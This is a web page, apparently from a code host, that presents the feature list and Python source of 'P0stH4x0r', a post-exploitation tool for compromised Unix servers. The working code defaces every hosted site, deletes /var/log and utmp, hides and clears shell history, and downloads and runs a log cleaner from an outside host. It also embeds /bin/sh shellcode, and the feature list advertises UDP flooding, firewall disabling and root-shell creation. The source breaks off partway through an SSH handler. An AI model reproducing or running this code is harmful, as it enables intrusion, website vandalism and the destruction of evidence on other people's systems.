P0stH4x0r
It has many functions that can be executed on a Server when it has been uploaded…
- Stealth Shell-Like Environment (Bash Commands accepted and are not logged to .bash_history file!)
-Deface a Website
-Deface all Websites (Or those you select!)
- UDP Packet Flooder (Kick out any Computer from your Network using UDP Packets)
- <GHOST> Mode (Commands on Terminal starting with a Whitespace are not Logged to Bash History)
-Log Deleter
- Log IP Spoofer
-Bash_History Deleter and Editor
-SSH Connection Handler
-Shell Creation (That inherits the hacker’s current priviliges)
-Social-Engineering Tools for Fooling the Root
-Unix Privilige Escalation Checker Script (Credits to Joomlafkr – a.k.a. Th3Breacher)
- SUID File Finder
-Disable Default Firewall
-Package Installer
-In-Script Updater (No Need to check the Website everytime for new Versions)
SOURCE
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################## | |
##### P0STH4X0R ##### | |
##### Dev: Akatzbreaker ##### | |
##### Blog: gnahackteam.wordpress.com ##### | |
##### Web: p0sth4x0r.net46.net ##### | |
##### Twitter: @akatzbreaker ##### | |
################################################## | |
## NOTE: To Download the log cleaner visit this link: http://pastebin.com/35Fn6TFY | |
## The Website has been banned from 000webhost so it isn't accessible any more! | |
## (The Updater won't work and probably many other features! ^^^^^^^^) | |
########## | |
########## | |
########################################### | |
# | |
# LICENSE | |
# | |
# P0stH4x0r is free software: you can redistribute it and/or modify | |
# it under the terms of the GNU General Public License as published by | |
# the Free Software Foundation, either version 3 of the License, or | |
# (at your option) any later version. | |
# | |
# P0stH4x0r is distributed in the hope that it will be useful, | |
# but WITHOUT ANY WARRANTY; without even the implied warranty of | |
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
# GNU General Public License for more details. | |
# | |
# You should have received a copy of the GNU General Public License | |
# along with this program. If not, see <http://www.gnu.org/licenses/>. | |
# | |
# | |
# | |
# P0stH4x0r - Python Post Exploitation Script | |
# Copyright (C) 2012 akatzbreaker | |
# | |
# ==================================================================== | |
# | |
# The Log Cleaner is a Modified Version of Ropeadope.py! | |
# All credits go to pr1me and Nullsecurity Team for that Script... | |
# | |
########################################### | |
import os | |
import random | |
import re | |
import time | |
import urllib2 | |
import string | |
import socket | |
import getpass | |
########################################## Color Variables #### | |
class bcolors: | |
PURPLE = '\033[95m' | |
BLUE = '\033[94m' | |
GREEN = '\033[92m' | |
ORANGE = '\033[93m' | |
RED = '\033[91m' | |
END = '\033[0m' | |
def disable(self): | |
self.PURPLE = '' | |
self.BLUE = '' | |
self.GREEN = '' | |
self.ORANGE = '' | |
self.RED = '' | |
self.END = '' | |
######### Check if Unix-Based ########### | |
if os.name is not 'posix': | |
print("\n\nUnidentified OS! Please use with Unix-Based OSes!\n\n") | |
raw_input("Hit <ENTER> to Exit...") | |
time.sleep(1) | |
exit() | |
else: | |
pass | |
######################################################################## | |
## Curent Version ## | |
version = '3.0.1' | |
## Determine Package Manager | |
def file_exists(fname): | |
try: | |
os.stat(fname) | |
return True | |
except OSError: | |
return False | |
installcmd="" | |
updatecmd="" | |
def installerfd(): | |
if file_exists('/usr/bin/yum'): | |
# Yum | |
print(bcolors.ORANGE + "\n\nNote: yum Installer used!\n\n" + bcolors.END) | |
installcmd="yum install " | |
updatecmd="yum update " | |
elif file_exists('/usr/bin/emerge'): | |
# Emerge | |
print(bcolors.ORANGE + "\n\nNote: emerge Installer used!\n\n" + bcolors.END) | |
installcmd="emerge " | |
updatecmd="emerge --update " | |
elif file_exists('/usr/bin/pacman'): | |
# Pacman | |
print(bcolors.ORANGE + "\n\nNote: packman Installer used!\n\n" + bcolors.END) | |
installcmd="pacman -S" | |
updatecmd="pacman -Syyuf " | |
elif file_exists('/usr/bin/zypper'): | |
# Zypper | |
print(bcolors.ORANGE + "\n\nNote: zypper Installer used!\n\n" + bcolors.END) | |
installcmd="zypper install " | |
updatecmd="zypper update " | |
elif file_exists('/usr/bin/apt-get'): | |
# Apt-Get | |
print(bcolors.ORANGE + "\n\nNote: apt-get Installer used!\n\n" + bcolors.END) | |
updatecmd="apt-get update " | |
installcmd="apt-get install " | |
else: | |
# Apt-Get | |
print(bcolors.ORANGE + "\n\nNote: there wasn't any Installer found! Assuming apt-get by Default....\n\n" + bcolors.END) | |
updatecmd="apt-get update " | |
installcmd="apt-get install " | |
def ghost(): | |
usernm=getpass.getuser() | |
ghcmd='echo "\nHISTCONTROL=ignorespace" >> ~/.bashrc' | |
gcmd="HISTCONTROL=ignorespace" | |
try: | |
hm="" | |
if usernm == 'root': | |
hm="/" | |
else: | |
hm="/home/" | |
f=open(hm + usernm + "/.bashrc",'r') | |
cnt=f.readlines() | |
f.close() | |
s="" | |
for i in cnt: | |
if i == gcmd: | |
s=1 | |
break | |
else: | |
os.system(ghcmd) | |
print(bcolors.GREEN + "<GHOST> Mode Enabled Successfully!" + bcolors.END) | |
s="" | |
print(bcolors.BLUE + "\n\n -- Now, all commands starting by Space, will NOT be logged at the .bash_history file!\n Example:\n root@bt:~# ls (Note the Extra Space before 'ls')\n\n >> P0stH4x0r Shell Commands are by Default not Logged to .bash_history! << \n\n" + bcolors.END) | |
break | |
if s==1: | |
print(bcolors.ORANGE + "\n<GHOST> Mode Enabled by Default from the Root User!\n" + bcolors.END) | |
except: | |
print(bcolors.RED + "\n[!] Something Went Wrong while Enabling the <GHOST> Mode! Please Try to enable it Manually by typing at the Shell:\n ghost\n" + bcolors.END) | |
print(bcolors.BLUE + " --> NOTE: To Disable <GHOST> Mode, please advise the Help Menu or the Help Pages on p0sth4x0r.net46.net\n" + bcolors.END) | |
time.sleep(2) | |
######################################################################## | |
license=""" | |
P0stH4x0r Copyright (C) 2012 akatzbreaker | |
This program comes with ABSOLUTELY NO WARRANTY. | |
This is free software, and you are welcome to redistribute it | |
under certain conditions. | |
Read the LICENSE.txt file for Details! | |
I don't promote ANY Damage or stealing of others' Property! I just provide the script as is! | |
""" | |
### ASCII ARTS ### | |
ascii1=""" | |
______________________________________________________________ ___ __ _ | |
_ _ _ _ | |
__ _| |____ _| |_ __| |__ _ _ ___ __ _| |_____ _ _ | |
/ _` | / / _` | _|_ / '_ \ '_/ -_) _` | / / -_) '_| | |
\__,_|_\_\__,_|\__/__|_.__/_| \___\__,_|_\_\___|_| | |
____________________________________________P0sth4x0r_________ ___ __ _ | |
""" | |
ascii2=""" | |
__ _ __ __ | |
_________ ____ / /_ (_) /_/ / | |
/ ___/ __ \/ __ \/ __/ / / __/ / | |
/ / / /_/ / /_/ / /_ / / /_/_/ | |
/_/ \____/\____/\__/ /_/\__(_) | |
> whoami | |
root | |
> ls -a | |
. .. P0stH4x0r.py | |
""" | |
ascii3=""" | |
'|| /|| .''', | |
|| // || | | | |
||''|, //..||.. \\ // | | '||''| | |
|| || || >< | | || | |
.|| || || // \\ `,,,' .||. | |
""" | |
ascii4=""" | |
_________ | |
/ /. | |
.-------------. /_________/ | | |
/ / | | | | | |
/+============+\ | | |====| | | | |
||root@bt> || | | | | | |
||> P0stH4x0r || | | |====| | | | |
|| || | | ___ | | | |
|| || | | |166| | | | |
|| ||/@@@ | --- | | | |
\+============+/ @ |_________|./. | |
@ .. ....' | |
..................@ __.'.' '' | |
/oooooooooooooooo// /// | |
/................// /_/ | |
------------------ | |
""" | |
ascii5=""" | |
________________________________________ | |
|root@bt:~$ python P0stH4x0r.py | | |
| | | |
|>>> P0stH4x0r <<< | | |
|> Created by Akatzbreaker | | |
|> Web: gnahackteam.wordpress.com | | |
|> Twitter: @akatzbreaker | | |
|> Credits: joomlafkr (aka Th3Br3acher) | | |
| Max00355 / Georgekok97 | | |
| creepycreeper | | |
| | | |
| | | |
|- Continue to Main Program [Y/n] Y | | |
| | | |
| | | |
|[*] Loading... | | |
|________________________________________| | |
""" | |
ascii6=""" | |
_|_|_|_| _| _| _| | |
_| _| _| _|_|_| _| _|_| _|_|_|_| | |
_|_|_| _|_| _| _| _| _| _| _| _| | |
_| _| _| _| _| _| _| _| _| _| | |
_|_|_|_| _| _| _|_|_| _| _|_| _| _|_| | |
_| | |
_| | |
_____P0stH4x0r_____ | |
""" | |
ascii7=""" | |
// ) ) ___ // / / ___ | |
//___/ / // ) ) ___ __ ___ //___ / //___/ / // ) ) __ | |
/ ____ / // / / (( ) ) / / / ___ /____ /\\ / / // / / // ) ) | |
// // / / \ \ / / // / / / / \/ / // / / // | |
// ((___/ / // ) ) / / // / / / / / /\ ((___/ / // | |
""" | |
ascii8=""" | |
H) hh k) 2)AAA L) | |
H) hh k) 2) AA L) | |
H)hhhhhh a)AAAA c)CCCC k) KK 2) L) e)EEEEE a)AAAA r)RRR n)NNNN | |
H) hh a)AAA c) k)KK 2) L) e)EEEE a)AAA r) RR n) NN | |
H) hh a) A c) k) KK 2) L) e) a) A r) n) NN | |
H) hh a)AAAA c)CCCC k) KK 2)AAAAA L)llllll e)EEEE a)AAAA r) n) NN | |
""" | |
ascii9=""" | |
______ _____ _ _ _ _ _____ | |
(_____ \(_____) _ (_) (_) | (_) (_____) | |
_____) ) __ _ ___ _| |_ _______| |_____ _ _ _ __ _ ____ | |
| ____/ |/ /| |/___|_ _) ___ |_____ ( \ / ) |/ /| |/ ___) | |
| | | /_| |___ | | |_| | | | | |) X (| /_| | | | |
|_| \_____/(___/ \__)_| |_| |_(_/ \_)\_____/|_| | |
""" | |
ascii10=""" | |
o-o o o O o-O-o | |
o |\ | / \ | | |
| -o | \ | o---o | o-o oo o-O-o | |
o | | \| | | | |-' | | | | | | |
o-o O o o O o oO o o-o o-o- o o o | |
""" | |
ascii11=r""" | |
ad88888ba 88 88 88 88 | |
d8" "8b 88 88 88 88 | |
Y8, 88 88 88 88 | |
`Y8aaaaa, 88,dPPYba, ,adPPYba, 88 88 ,adPPYba, ,adPPYba, ,adPPYb,88 ,adPPYba, | |
`'''''8b, 88P' "8a a8P_____88 88 88 a8" "" a8" "8a a8" `Y88 a8P_____88 | |
`8b 88 88 8PP''''''' 88 88 8b 8b d8 8b 88 8PP''''''' | |
Y8a a8P 88 88 "8b, ,aa 88 88 "8a, ,aa "8a, ,a8" "8a, ,d88 "8b, ,aa | |
"Y88888P" 88 88 `"Ybbd8"' 88 88 `"Ybbd8"' `"YbbdP"' `"8bbdP"Y8 `"Ybbd8"' | |
___________________________________________________________________ | |
| | | |
| char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\ | | |
| "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\ | | |
| "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\ | | |
| "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\ | | |
| "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42"; | | |
|___________________________________________________________________| | |
""" | |
ascii12=""" | |
| | | | | |
_` | | / _` | __|_ / __ \ __| _ \ _` | | / _ \ __| | |
( | < ( | | / | | | __/ ( | < __/ | | |
\__,_|_|\_\__,_|\__|___|_.__/ _| \___|\__,_|_|\_\___|_| | |
""" | |
asciis=[ascii1,ascii2,ascii3,ascii4,ascii5,ascii6,ascii7,ascii8,ascii9,ascii10,ascii11,ascii12] | |
################## | |
################################### MAIN SCRIPT ###################################### | |
######### LICENSE ################## | |
print("\n") | |
time.sleep(1) | |
print(bcolors.RED + license + bcolors.END) | |
print(bcolors.ORANGE + "\nPlease Read! Continuing in 3 seconds..." + bcolors.END) | |
time.sleep(3) | |
raw_input(bcolors.RED + "Hit <ENTER> to Proceed!" + bcolors.END) | |
os.system("clear") | |
########################################################################## | |
def main(): | |
try: | |
request="" | |
try: | |
request=urllib2.urlopen("http://p0sth4x0r.net46.net/download/update/version.html").read().split('-')[0] | |
except: | |
request=version | |
if version == request: | |
pass | |
elif request == '<!DOCTYPE HTML PUBLIC "': | |
print(bcolors.ORANGE + "\n!! Couldn't Connect to the Server !!\n" + bcolors.END) | |
time.sleep(1) | |
else: | |
ver1=version.split(".")[0] | |
ver2=version.split(".")[1] | |
ver3=version.split(".")[2] | |
req1=request.split(".")[0] | |
req2=request.split(".")[1] | |
req3=request.split(".")[2] | |
if ver1 < req1 or ver2 < req2 or ver3 < req3: | |
print(bcolors.RED + "\n************************************************************\n\n P0stH4x0r Update Available!\n\n************************************************************\n" + bcolors.END) | |
print(bcolors.BLUE + "\n New Update: " + request[0:5] + "\n" + bcolors.END) | |
print(bcolors.GREEN + "\n >> Please use the In-Script Updater to get the Latest Version << \n" + bcolors.END) | |
time.sleep(2) | |
else: | |
pass | |
except: | |
pass | |
shct=0 | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + """ | |
{ Developed By: Akatzbreaker } | |
{ Web: gnahackteam.wordpress.com } | |
{ Script's-Web: p0sth4x0r.net46.net } | |
{ Twitter: @akatzbreaker } | |
{{ Version: %(version)s }} | |
""" % {'version':version}) | |
installerfd() | |
ghost() | |
while 1: | |
if shct == 15: | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + """ | |
{ Developed By: Akatzbreaker } | |
{ Web: gnahackteam.wordpress.com } | |
{ Script's-Web: p0sth4x0r.net46.net } | |
{ Twitter: @akatzbreaker } | |
{{ Version: %(version)s }} | |
""" % {'version':version}) | |
shct=0 | |
opt=raw_input(bcolors.BLUE + "p0sth4x0r:# " + bcolors.END) | |
shct=shct+1 | |
if opt == 'defacer': | |
# Defacer | |
defacer() | |
elif opt == 'hideme': | |
# Hide Me | |
hideme() | |
elif opt == 'sshhelp': | |
# SSH Connection Open Function | |
ssher() | |
elif opt == 'createroot': | |
# Root Creation | |
rooter() | |
elif opt == 'suidshell': | |
# Root Shell Creation | |
shelled() | |
elif opt == 'se': | |
# Social Engineering | |
socialiser() | |
elif opt == 'privesc': | |
# Priviledge Escalation | |
privesc() | |
elif opt == 'findsuid': | |
# Find all SUID Files | |
suID() | |
elif opt == 'udpflood': | |
# UDP Packet Flooder | |
udpflood() | |
elif opt == 'disable_firewall': | |
# Firewall Disabler | |
firedis() | |
elif opt == 'ghost': | |
# Enable <GHOST> Mode | |
ghost() | |
elif opt == 'unghost': | |
# Disable <GHOST> Mode | |
unghost() | |
elif opt == 'packageinstall': | |
# Package Installer | |
pinstmenu() | |
elif opt == 'psupdate': | |
# Update P0stH4x0r | |
updater() | |
elif opt == 'about': | |
# About | |
about() | |
elif opt == 'help' or opt == '?' or opt == 'h': | |
# Help | |
help() | |
elif opt == 'banner' or opt == 'art' or opt == 'artwork': | |
# Show Banner | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
elif opt == 'quit' or opt == 'exit': | |
# Exit | |
print("Quitting...") | |
time.sleep(1) | |
os.system("clear") | |
break | |
elif opt == "" or opt == " ": | |
pass | |
else: | |
print(bcolors.ORANGE + "\n[*] Executing: " + opt + bcolors.END) | |
os.system(opt) | |
print("\n\n") | |
## Deface Countdown Setter | |
def defacer(): | |
#extfl="" | |
defm=" 1. Set Deface Page %(purple)s[URL Allowed!]%(green)s\n 2. Set Website(s) to Deface\n 3. List Websites on this Server\n 4. Apply\n 5. Exit" | |
page="" | |
index=[''] | |
def pager(): | |
# Set Deface Page | |
pathtodef=raw_input(bcolors.RED + "Enter the Path (or URL) to your Deface Page:\n" + bcolors.END) | |
global extfl | |
if "http://" in pathtodef: | |
try: | |
rq=urllib2.urlopen(pathtodef).read() | |
if rq: | |
print(bcolors.GREEN + "Deface Page Set Successfully!" + bcolors.END) | |
extfl="html" | |
return rq | |
else: | |
print(bcolors.RED + "ERROR! Nothing Found at this URL!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
except: | |
print(bcolors.RED + "ERROR: Cannot open " + pathtodef + "! Check your Internet Connection and that you inputted a Valid URL (http://)..." + bcolors.END) | |
time.sleep(2) | |
os.system('clear') | |
else: | |
try: | |
defer=open(pathtodef,'r') | |
defcont=defer.read() | |
defer.close() | |
extension=pathtodef.split(".")[-1] | |
if extension == 'html': | |
extfl='html' | |
elif extension == 'php': | |
extfl='php' | |
elif extension == 'asp': | |
extfl='asp' | |
else: | |
print(bcolors.RED + "Extension Not Recognisable! Using HTML...\n" + bcolors.END) | |
extfl='html' | |
print(bcolors.GREEN + "\nDeface Page Set Successfully!" + bcolors.END) | |
return defcont | |
except: | |
print(bcolors.RED + "\nERROR: Cannot open " + pathtodef + "!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
def indexer(): | |
# Set Website(s) to Deface | |
print(bcolors.PURPLE + " (Please see the Help in this Script!" + bcolors.END) | |
sel= raw_input(bcolors.RED + "Enter the Website to Deface:\n" + bcolors.END) | |
websites=[''] | |
if ',' in sel: | |
websites=[] | |
controller=0 | |
try: | |
for i in sel: | |
webs=sel.split(',')[controller] | |
websites.append(webs) | |
controller=controller+1 | |
except: | |
pass | |
else: | |
websites[0]=sel | |
if len(websites) > 0: | |
return websites | |
else: | |
print(bcolors.RED + "ERROR: Nothing Entered!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
def lister(): | |
# List Websites on the Server | |
print(bcolors.ORANGE + "Listing Websites on this Server..." + bcolors.END) | |
time.sleep(2) | |
try: | |
if file_exists("/var/www"): | |
print(bcolors.BLUE + ">> Webserver's Directory: /var/www <<\n" + bcolors.END) | |
for filename in os.listdir("/var/www"): | |
print("[+]" + filename) | |
else: | |
print(bcolors.BLUE + ">> Webserver's Directory: /home/*/public_html <<\n" + bcolors.END) | |
for filename in os.listdir("/home/"): | |
print("[+]" + filename) | |
except: | |
print(bcolors.RED + "No Webserver Directories found in /var/www or /home/*/public_html!" + bcolors.END) | |
raw_input(bcolors.ORANGE + "\n\nHit <ENTER> to Continue..." + bcolors.END) | |
def apply_deface(extfl='html'): | |
if extfl==None or extfl == '': | |
extfl='html' | |
# Apply Deface | |
webst=[] | |
websites=index | |
if websites[0] == '*': | |
webst=["a"] | |
else: | |
webst=websites | |
# Apache Servers: /var/wwwa | |
www="/var/www/" | |
# Other Misc Servers: /home/*/public_html | |
www2="/home/" | |
pt_www2="public_html" | |
webserver="" | |
if file_exists(www): | |
webserver=www | |
print(bcolors.BLUE + "\nWebserver Directory: /var/www\n" + bcolors.END) | |
elif file_exists(www2): | |
webserver=www2 | |
print(bcolors.BLUE + "\nWebserver Directory: /home/*/public_html\n" + bcolors.END) | |
else: | |
webserver=www | |
print(bcolors.RED + "\nWebserver Directory NOT Found! Assuming /var/www\n" + bcolors.END) | |
###################################### /var/www ################################################### | |
if webst[0] == 'a' and webserver == www: | |
try: | |
for dirs in os.listdir("/var/www"): | |
for files in os.listdir("/var/www/" + dirs): | |
try: | |
if "index.html" in files: | |
os.system("mv " + www + dirs + "/index.html " + www + dirs + "/index2.html") | |
f=open(www + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.php" in files: | |
os.system("mv " + www + dirs + "/index.php " + www + dirs + "/index2.php") | |
f=open(www + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.asp" in files: | |
os.system("mv " + www + dirs + "/index.asp " + www + dirs + "/index2.asp") | |
f=open(www + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.html" not in files and "index.php" not in files and "index.asp" not in files: | |
f=open(www + dirs + "/index." + extfl,'w+') | |
f.write(page) | |
f.close() | |
else: | |
pass | |
print(bcolors.GREEN + "Website: " + dirs + "... Done!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Website: " + dirs + ".... No Success..." + bcolors.END) | |
except: | |
pass | |
elif len(webst) > 0 and webserver == www: | |
try: | |
for dirs in webst: | |
for files in os.listdir("/var/www/" + dirs): | |
try: | |
if "index.html" in files: | |
os.system("mv " + www + dirs + "/index.html " + www + dirs + "/index2.html") | |
f=open(www + dirs + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.php" in files: | |
os.system("mv " + www + dirs + "/index.php " + www + dirs + "/index2.php") | |
f=open(www + dirs + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.asp" in files: | |
os.system("mv " + www + dirs + "/index.asp " + www + dirs + "/index2.asp") | |
f=open(www + dirs + dirs + "/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.html" not in files and "index.php" not in files and "index.asp" not in files: | |
f=open(www + dirs + "/index." + extfl,'w+') | |
f.write(page) | |
f.close() | |
else: | |
pass | |
print(bcolors.GREEN + "Website: " + dirs + "... Done!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Website: " + dirs + ".... No Success..." + bcolors.END) | |
except: | |
pass | |
####################################### /home/*/public_html ############################################### | |
if webst[0] == 'a' and webserver == www2: | |
try: | |
for dirs in os.listdir("/home/"): | |
#for files in os.listdir("/home/" + dirs): | |
for files in os.listdir("/home/" + dirs + "/public_html"): | |
try: | |
if "index.html" in files: | |
os.system("mv " + www2 + dirs + "/public_html/index.html " + www2 + dirs + "/public_html/index2.html") | |
f=open(www2 + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.php" in files: | |
os.system("mv " + www2 + dirs + "/public_html/index.php " + www2 + dirs + "/public_html/index2.php") | |
f=open(www2 + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.asp" in files: | |
os.system("mv " + www2 + dirs + "/public_html/index.asp " + www2 + dirs + "/public_html/index2.asp") | |
f=open(www2 + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.html" not in files and "index.php" not in files and "index.asp" not in files: | |
f=open(www2 + dirs + "/public_html/index." + extfl,'w+') | |
f.write(page) | |
f.close() | |
else: | |
pass | |
print(bcolors.GREEN + "Website: " + dirs + "... Done!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Website: " + dirs + ".... No Success..." + bcolors.END) | |
except: | |
pass | |
elif len(webst) > 0 and webserver == www2: | |
try: | |
for dirs in webst: | |
#for files in os.listdir("/home/" + dirs): | |
for files in os.listdir("/home/" + dirs + "/public_html"): | |
try: | |
if "index.html" in files: | |
os.system("mv " + www2 + dirs + "/public_html/index.html " + www2 + dirs + "/public_html/index2.html") | |
f=open(www2 + dirs + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.php" in files: | |
os.system("mv " + www2 + dirs + "/public_html/index.php " + www2 + dirs + "/public_html/index2.php") | |
f=open(www2 + dirs + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.asp" in files: | |
os.system("mv " + www + dirs + "/public_html/index.asp " + www + dirs + "/public_html/index2.asp") | |
f=open(www + dirs + dirs + "/public_html/index." + extfl,'w') | |
f.write(page) | |
f.close() | |
elif "index.html" not in files and "index.php" not in files and "index.asp" not in files: | |
f=open(www2 + dirs + "/public_html/index." + extfl,'w+') | |
f.write(page) | |
f.close() | |
else: | |
pass | |
print(bcolors.GREEN + "Website: " + dirs + "... Done!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Website: " + dirs + ".... No Success..." + bcolors.END) | |
except: | |
pass | |
else: | |
print(bcolors.RED + "ERROR: Something is Misconfigured!" + bcolors.END) | |
print(bcolors.ORANGE + "\n\nDone!\n" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
while 1: | |
os.system("clear") | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + "[Defacer]" + bcolors.END) | |
print("\n") | |
print(bcolors.GREEN + defm % {'purple':bcolors.PURPLE,'green':bcolors.GREEN} + bcolors.END) | |
sus=raw_input(bcolors.RED + "\nYour Choice: " + bcolors.END) | |
if sus == '1': | |
page=pager() | |
time.sleep(1) | |
os.system("clear") | |
elif sus =='2': | |
index=indexer() | |
print(bcolors.GREEN + "Websites to Deface Configured!" + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
elif sus == '3': | |
lister() | |
elif sus == '4': | |
global extfl | |
apply_deface(extfl) | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
## Hide Me Function | |
def hideme(): | |
# Delete Logs | |
def logoff(): | |
sure=raw_input(bcolors.RED + "This action will delete the Unix default log directory. Are you sure you want to Continue? Y/n " + bcolors.END) | |
if sure == 'y' or sure == 'Y': | |
print(bcolors.ORANGE + "Deleting /var/log Contents..." + bcolors.END) | |
os.system("rm -rf /var/log/*") | |
print(bcolors.ORANGE + "Deleting /var/run/utmp..." + bcolors.END) | |
os.system("rm -rf /var/run/utmp*") | |
print(bcolors.ORANGE + "Deleting /etc/httpd/log/ Contents..." + bcolors.END) | |
os.system("rm -rf /etc/httpd/log/*") | |
print(bcolors.ORANGE + "Done!" + bcolors.END) | |
time.sleep(1) | |
os.system('clear') | |
else: | |
print(bcolors.ORANGE + "Returning Back..." + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
# Randomise Logs | |
def randomlog(): | |
print(bcolors.RED + "This will download a Modified version of Ropeadope.py to clean the Logs..." + bcolors.END) | |
time.sleep(1) | |
print(bcolors.GREEN + "\nNow Downloading...\n\n" + bcolors.END) | |
time.sleep(1) | |
# try: | |
logcleaner=urllib2.urlopen("http://www.p0sth4x0r.net46.net/download/files/logcleaner.py").read() | |
lgcfl=open("logcleaner.py",'w') | |
lgcfl.write(logcleaner) | |
lgcfl.close() | |
# except: | |
# print(bcolors.RED + "Something Went Wrong! Please Retry... " + bcolors.END) | |
print(bcolors.RED + "\nDownloading: Done!" + bcolors.END) | |
print(bcolors.ORANGE + '\n\nNow Executing...\n' + bcolors.END) | |
os.system("python logcleaner.py") | |
print(bcolors.GREEN + "Done!" + bcolors.END) | |
print(bcolors.ORANGE + "\nCleaning Up..." + bcolors.END) | |
os.system("rm logcleaner.py") | |
print(bcolors.GREEN + "\n\nDone!\n\n" + bcolors.END) | |
time.sleep(1) | |
# Delete Bash History | |
def delbash(): | |
sure=raw_input(bcolors.RED + "This action will delete the Contents of Bash History. Are you sure you want to Continue? Y/n " + bcolors.END) | |
if sure == 'Y' or sure == 'y': | |
try: | |
f=open("~/.bash_history",'w') | |
f.close() | |
print(bcolors.ORANGE + "Done!" + bcolors.END) | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try Again later... (with Root Priviliges!)" + bcolors.END) | |
time.sleep(1) | |
os.system('clear') | |
else: | |
print(bcolors.ORANGE + "Returning Back..." + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
# Edit Bash History | |
def edbash(): | |
print(bcolors.ORANGE + "A 'nano' text editor will open. Edit the Bash History as you like..." + bcolors.END) | |
time.sleep(2) | |
sure=raw_input(bcolors.RED + "Continue? Y/n " + bcolors.END) | |
if sure == 'y' or sure == 'Y': | |
os.system("nano ~/.bash_history") | |
print(bcolors.PURPLE + " (If 'nano' is not installed (not usual), you can use other editors on your own. The Location of the file is: ~/.bash_history. Another good editor is 'VIM'...)" + bcolors.END) | |
else: | |
print(bcolors.ORANGE + "Returning Back..." + bcolors.END) | |
time.sleep(1) | |
os.system("clear") | |
hide_me1="\n[Hide-Me Options]" | |
hide_me2=" 1. Delete Logs (Very Obvious - NOT Recommended!)" | |
hide_me6=" 2. Spoof your IP (HIGHLY RECOMMENDED!)" | |
hide_me3=" 3. Delete Bash History" | |
hide_me4=" 4. Change Bash History" | |
hide_me5=" 5. Exit" | |
while 1: | |
os.system('clear') | |
print(bcolors.BLUE + random.choice(asciis) + bcolors.END) | |
print(bcolors.PURPLE + hide_me1 + bcolors.END) | |
print("\n\n") | |
print(bcolors.GREEN + hide_me2 + bcolors.END) | |
print(bcolors.GREEN + hide_me6 + bcolors.END) | |
print(bcolors.GREEN + hide_me3 + bcolors.END) | |
print(bcolors.GREEN + hide_me4 + bcolors.END) | |
print(bcolors.GREEN + hide_me5 + bcolors.END) | |
print("\n") | |
hidemychoice=raw_input(bcolors.RED + "Your Choice: " + bcolors.END) | |
if hidemychoice == '1': | |
# Delete Logs | |
try: | |
logoff() | |
except: | |
print(bcolors.RED + "Root Required to Delete Logs!" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif hidemychoice == '2': | |
# Randomise All Logs | |
euid = os.geteuid() | |
if euid == 0: | |
# try: | |
randomlog() | |
# except: | |
# print(bcolors.RED + "Something went Wrong! Please Try Again..." + bcolors.END) | |
# time.sleep(2) | |
# os.system("clear") | |
else: | |
print(bcolors.RED + "You are NOT Root! This function Requires you to be Root..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif hidemychoice == '3': | |
# Delete Bash History | |
try: | |
delbash() | |
except: | |
print(bcolors.RED + "Could not open ~/.bash_history" + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
elif hidemychoice == '4': | |
# Change Bash History | |
try: | |
edbash() | |
except: | |
print(bcolors.RED + "Something Went Wrong! Try again with Root Priviliges..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
else: | |
print(bcolors.ORANGE + "\n\nReturning Back to the Main Screen..." + bcolors.END) | |
time.sleep(2) | |
os.system("clear") | |
break | |
## SSH Server Handler | |
def ssher(): | |
def sinstall(): | |
print(bcolors.ORANGE + "Installing OpenSSH..." + bcolors.PURPLE + " (requires Root Priviledges!)" + bcolors.END) | |
time.sleep(1) | |
print(bcolors.PURPLE + "\nYou need to run P0stH4x0r with Root Priviliges to Install OpenSSH!\n" + bcolors.END) | |
os.system(installcmd + "openssh-server") | |
time.sleep(2) | |
def screate(): | |
print(bcolors.ORANGE + "Starting SSH Server...\n" + bcolors.END) | |
os.system("service ssh start") | |
time.sleep(2) | |
def sclose(): | |
print(bcolors.ORANGE + "Closing SSH Server...\n" + bcolors.END) | |
os.system("service ssh stop") | |
time.sleep(2) | |
while 1: | |
os.system("clear") | |
